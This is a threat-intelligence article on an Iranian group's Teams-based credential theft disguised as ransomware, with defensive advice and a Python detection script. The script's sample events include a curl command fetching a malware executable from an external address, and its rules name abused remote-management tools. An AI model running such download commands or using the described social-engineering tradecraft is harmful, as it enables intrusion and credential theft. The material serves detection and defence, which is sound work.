Iranian hacking group MuddyWater is using Microsoft Teams for sophisticated credential theft in a false flag ransomware operation that deliberately mimics cybercriminal tactics to obscure attribution.
The Iranian state-sponsored hacking group MuddyWater has been conducting a sophisticated campaign that leverages Microsoft Teams for credential theft in what researchers are calling a "false flag" ransomware operation. This campaign, observed by Rapid7 in early 2026, represents a concerning trend where state-sponsored actors increasingly adopt cybercriminal tradecraft to muddy attribution and complicate defensive responses.

Social Engineering via Teams
The attack begins with a high-touch social engineering phase conducted directly through Microsoft Teams. Attackers initiate external chat requests to engage with employees, then utilize interactive screen-sharing sessions to harvest credentials and manipulate multi-factor authentication (MFA).
"The campaign was characterized by a high-touch social engineering phase conducted via Microsoft Teams, where the attackers utilized interactive screen-sharing to harvest credentials and manipulate multi-factor authentication (MFA)," Rapid7 reported. "Once inside, the group bypassed traditional ransomware workflows, forgoing file encryption in favor of data exfiltration and long-term persistence via remote management tools like DWAgent."
This approach allows the attackers to establish an initial foothold without raising immediate suspicion, as Teams communications appear legitimate to unsuspecting employees.
False Flag Operation
What makes this campaign particularly noteworthy is its deliberate attempt to mimic financially motivated ransomware-as-a-service (RaaS) groups. The attackers initially appeared to be associated with the Chaos RaaS group, which emerged in early 2025 and has claimed 36 victims, primarily in the U.S., across the construction, manufacturing, and business services sectors.
Chaos employs a double extortion model using mail flooding and vishing via Teams, often impersonating IT support personnel to trick victims into installing remote access tools like Microsoft Quick Assist. The group has demonstrated triple extortion through DDoS threats and quadruple extortion by threatening to contact customers or competitors.
However, evidence points to MuddyWater conducting a targeted state-backed attack that merely masquerades as opportunistic extortion. The Iranian group has strategically adopted Chaos tactics while maintaining its own objectives.
Sophisticated Infection Chain
The intrusion analyzed by Rapid7 reveals a multi-stage infection chain that demonstrates considerable technical sophistication:
- Initial access through Teams screen-sharing sessions where victims are instructed to enter credentials into locally created text files
- Use of compromised user accounts for reconnaissance and establishing persistence
- Deployment of remote management tools like DWAgent and AnyDesk for long-term access
- Lateral movement throughout the victim's environment
- Data exfiltration
- Contact via email for ransom negotiations (though no actual encryption occurs)
The technical execution involves downloading an executable ("ms_upd.exe") from an external server using RDP and curl. This binary initiates a multi-stage infection chain that delivers additional malicious components:
- ms_upd.exe (Stagecomp): Collects system information and communicates with C2 servers to drop next-stage payloads
- game.exe (Darkcomp): A bespoke remote access trojan (RAT) masquerading as a legitimate Microsoft WebView2 application
- WebView2Loader.dll: A legitimate DLL required by Microsoft Edge WebView2
- visualwincomp.txt: An encrypted configuration file used by the RAT
"While connected, the TA [threat actor] executed basic discovery commands, accessed files related to the victim's VPN configuration, and instructed users to enter their credentials into locally created text files," Rapid7 explained. "In at least one instance, the TA also deployed a remote management tool (AnyDesk) to further facilitate access."
Attribution Challenges
Attribution to MuddyWater comes from the use of a code-signing certificate attributed to "Donald Gay" to sign "ms_upd.exe." This certificate has been previously used by the threat cluster to sign its malware, including a CastleLoader downloader called Fakeset.
The findings underscore a growing convergence between state-sponsored intrusion activity and cybercriminal tradecraft designed specifically to obscure attribution and delay defensive responses.
"The use of a RaaS framework in this context may enable the actor to blur distinctions between state-sponsored activity and financially motivated cybercrime, thereby complicating attribution," Rapid7 noted. "Furthermore, the inclusion of extortion and negotiation elements could serve to focus defensive efforts on immediate impact, likely delaying the identification of underlying persistence mechanisms."
Strategic Objectives
This approach serves multiple strategic objectives for the Iranian group:
- Plausible deniability: By mimicking criminal groups, MuddyWater can create confusion about their involvement
- Operational flexibility: Leveraging criminal infrastructure and techniques expands their capabilities
- Distraction: The ransomware component appears to function primarily as an obfuscation mechanism rather than the primary objective
- Intelligence gathering: The data exfiltration suggests strategic information collection
This pattern aligns with MuddyWater's history of conducting ransomware attacks while maintaining state-sponsored objectives. In September 2020, they targeted Israeli organizations with a loader called PowGoop that deployed a variant of Thanos ransomware. In 2023, they partnered with DEV-1084 to conduct destructive attacks under the pretext of ransomware deployment. As recently as October 2025, they used the Qilin ransomware to target an Israeli government hospital.

Broader Context of Iranian Cyber Operations
This campaign exists within a broader escalation of Iranian-linked cyber operations. Hunt.io recently revealed an Iranian-nexus operation targeting Omani government institutions, exfiltrating over 26,000 Ministry of Justice user records, judicial case data, and registry hives.
Pro-Iran hacktivist groups like Handala Hack have also increased activity, claiming to have published details on nearly 400 U.S. Navy personnel in the Persian Gulf and attacking the Port of Fujairah in the UAE, leaking over 11,000 sensitive documents.
"The cyber and kinetic domains are now explicitly connected," noted Sergey Shykevich, group manager at Check Point Research. "Stolen port infrastructure data was allegedly used to enable physical missile targeting. This campaign is not slowing down. Every quiet period on the physical front has historically been followed by intensified cyber activity."
Defensive Recommendations
Organizations should consider several defensive measures to protect against similar attacks:
Microsoft Teams hardening:
- Restrict external chat permissions
- Implement strict screen-sharing policies
- Monitor for unusual Teams activity patterns
- Train users to recognize sophisticated social engineering attempts
Credential protection:
- Implement phishing-resistant MFA solutions
- Use password managers to avoid credential entry in untrusted files
- Monitor for credential harvesting activities
Endpoint detection:
- Monitor for suspicious process chains involving curl, RDP, and remote access tools
- Implement application control to prevent execution of unapproved tools
- Regularly update and patch remote access software
Network segmentation:
- Limit lateral movement capabilities
- Isolate critical systems from general network access
- Implement strict access controls for VPN configurations
Threat hunting:
- Actively search for persistence mechanisms like DWAgent and AnyDesk
- Monitor for unusual data exfiltration
- Check for signs of certificate abuse in code signing
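As an added illustration of the endpoint-detection and threat-hunting recommendations above (and of the curl-over-RDP delivery step described in the infection chain), the following Python is example code written for this article, not Rapid7's detection logic. It runs three rules over constructed, Sysmon-style process-creation events; the hosts, users, paths, the 203.0.113.10 address and the "approved tool" and "internal host" allowlists are all assumptions.

```python
import re
from urllib.parse import urlparse

# Constructed, Sysmon-style process-creation events for illustration only;
# hosts, users, paths and the 203.0.113.10 address are made up.
SAMPLE_EVENTS = [
    {"host": "WS01", "user": r"corp\jdoe", "logon_type": 10,
     "image": r"C:\Windows\System32\curl.exe",
     "cmdline": r"curl.exe -o C:\Users\jdoe\ms_upd.exe http://203.0.113.10/ms_upd.exe",
     "signer": None},
    {"host": "WS01", "user": r"corp\jdoe", "logon_type": 10,
     "image": r"C:\Users\jdoe\ms_upd.exe", "cmdline": "ms_upd.exe", "signer": "Donald Gay"},
    {"host": "WS02", "user": r"corp\asmith", "logon_type": 2,
     "image": r"C:\Program Files\DWAgent\dwagent.exe", "cmdline": "dwagent.exe", "signer": None},
    {"host": "WS03", "user": r"corp\itadmin", "logon_type": 2,
     "image": r"C:\Program Files\AnyDesk\AnyDesk.exe", "cmdline": "AnyDesk.exe", "signer": None},
    {"host": "WS04", "user": r"corp\build", "logon_type": 2,
     "image": r"C:\Windows\System32\curl.exe",
     "cmdline": "curl.exe -o tool.exe https://files.corp.example/tool.exe", "signer": None},
]

KNOWN_ABUSED_SIGNERS = {"donald gay"}   # signer name Rapid7 reports as reused by MuddyWater
RMM_BINARIES = {"dwagent.exe", "anydesk.exe", "quickassist.exe"}  # tools named in the article
APPROVED_RMM = {"anydesk.exe"}          # assumption: the one tool IT actually sanctions
INTERNAL_HOSTS = {"files.corp.example"} # assumption: approved download sources
RDP_LOGON = 10                          # Windows logon type 10 = RemoteInteractive (RDP)
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)

def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def evaluate(events):
    """Return (host, rule, detail) tuples for every event that matches a rule."""
    hits = []
    for ev in events:
        name = basename(ev["image"])
        # Rule 1: curl fetching an .exe from a non-approved host inside an RDP session.
        if name == "curl.exe" and ev["logon_type"] == RDP_LOGON:
            for url in URL_RE.findall(ev["cmdline"]):
                if url.lower().endswith(".exe") and (urlparse(url).hostname or "") not in INTERNAL_HOSTS:
                    hits.append((ev["host"], "curl_exe_download_over_rdp", url))
        # Rule 2: binary signed with a certificate already known to be abused.
        if (ev.get("signer") or "").lower() in KNOWN_ABUSED_SIGNERS:
            hits.append((ev["host"], "known_abused_signer", ev["image"]))
        # Rule 3: remote-management tool that is not on the approved list.
        if name in RMM_BINARIES and name not in APPROVED_RMM:
            hits.append((ev["host"], "unapproved_rmm_tool", name))
    return hits

if __name__ == "__main__":
    for hit in evaluate(SAMPLE_EVENTS):
        print(*hit)
```

The WS04 event shows the intended negative case: the same curl download from an approved internal host outside an RDP session produces no alert.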
The convergence of state-sponsored and cybercriminal tactics represents a significant challenge for defenders. Organizations must adopt more sophisticated detection and response strategies that can identify the underlying objectives of attacks, even when they're disguised as common criminal activity.
As Shykevich warns, "What we're seeing now is the most serious manifestation of that pattern to date." The blurring lines between different threat actor motivations require defenders to look beyond surface-level indicators and understand the full context of potential intrusions.
